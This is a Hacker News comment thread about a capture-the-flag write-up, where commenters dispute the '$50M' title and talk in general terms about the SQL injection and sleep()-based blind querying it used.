
$50M CTF from Hackerone – Writeup - lelf
https://github.com/manoelt/50M_CTF_Writeup
======
anc84
$50M references Hackerone paying out that amount in total over all time or
something. The bounty for this CTF was $10k.

~~~
alexandercrohde
Yeah, definitely needs title change

~~~
bch
Even “M” is confusing, where financial millions are often (usually?) MM
(thousand thousands, where M == Roman 1000).

------
scrollaway
> _First recon step here is to run a port scan to discover if there is any
> service. As a result I got port 80_

Overkill much? :)

> _There is only one user ( "admin", "5f4dcc3b5aa765d61d8327deb882cf99"). Is
> that a hash? Googled it and found the answer, yes it is: md5('password').
> Now we are able to log in using admin:password or even using the sqli_

Stuff like this makes me think the author accidentally went into this stuff in
reverse order. The username/password combo seems almost expected to be
manually bruteforceable.

Also, the whole blind-querying of strings using sleep() is awesome. Is that a
common technique or did the author make it up on the spot?

~~~
thaumasiotes
Using sleep() is a common technique, recommended specifically to let you query
data even when you aren't given output from the database. As long as you can
produce an effect that you can detect, you can extract information.

~~~
scrollaway
Figures :) TIL! Really cool seeing it in action.

------
JoachimS
Great writeup. Impressive to be able to find and be able to jump through so
manu hoops.

Every time I see one of there I reflect on the fact that if a person is
prepared to do all this work for either lulz or some kUSD, imagine what
efforts people might be prepared to do to gain 1-10-100 MUSD.

~~~
nickpsecurity
It's why we say in high-assurance security to address each root cause as
they're understood and mitigated. Then, build that into your languages,
analyzers, etc. Ada and Rust do that for lots of code injection opportunities.
For web apps, even PHP has Airship CMS to reduce risks. Jif/Sif languages
track information flows to block leaks. Several OS's do secure-by-default
configurations. And so on and so forth.

We know these attackers may expend a lot of effort. They also have more
education, tooling, and labor out there than at any time before. Might as well
use technology that makes blocking them something we don't even think about vs
a cat and mouse game where we must consider every detail for even common
operations or apps.

------
esseti
I'm always amazed about how one person can have so many ideas to break a
system from which you know nothing.

~~~
bashwizard
A solid methodology is key.

------
sigi45
Sooo i see 50M but it is probably just click bait as the are celebrating 50M
payed out in general?

The writeup is okay thou.

------
EnFinlay
Nice write-up!

